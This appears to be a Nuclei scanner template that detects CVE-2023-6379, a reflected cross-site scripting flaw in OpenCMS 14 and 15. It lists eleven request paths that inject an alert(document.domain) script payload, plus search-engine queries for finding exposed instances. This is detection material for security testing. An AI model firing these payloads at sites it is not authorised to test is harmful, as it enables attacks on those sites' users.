OpenCMS 14 & 15 - Cross Site Scripting

id: CVE-2023-6379

info:
  name: OpenCMS 14 & 15 - Cross Site Scripting
  author: msegoviag
  severity: medium
  description: |
    Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.
  remediation: |
    Update to version OpenCMS 16
  reference:
    - https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2023-6379
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6379
    - https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-alkacon-software-opencms
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://github.com/msegoviag/msegoviag
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-6379
    cwe-id: CWE-79
    epss-score: 0.00075
    epss-percentile: 0.32047
    cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 11
    vendor: alkacon
    product: opencms
    shodan-query:
      - title:"opencms"
      - http.title:"opencms"
      - cpe:"cpe:2.3:a:alkacon:opencms"
      - /opencms/
    fofa-query: title="opencms"
    google-query: intitle:"opencms"
  tags: cve2023,cve,opencms,xss,alkacon

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - '/tagebuch/eintraege/index.html?reloaded&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/list-editor/index.html?reloaded&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/compact/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/elaborate/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/lists/masonry/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/blog/articles/index.html?reloaded&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
        - '/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1'
        - '/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>" />'
          - 'OpenCms'
        condition: and

      - type: word
        part: content_type
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b23434311046f2118a934456d41f8450e59e2e9e10d33826f69c38176088f17c022100f3116a2cea078ef92a687c66f3793852f830e397529696f42679d997ebb2f150:922c64590222798bb761d5b6d8e72950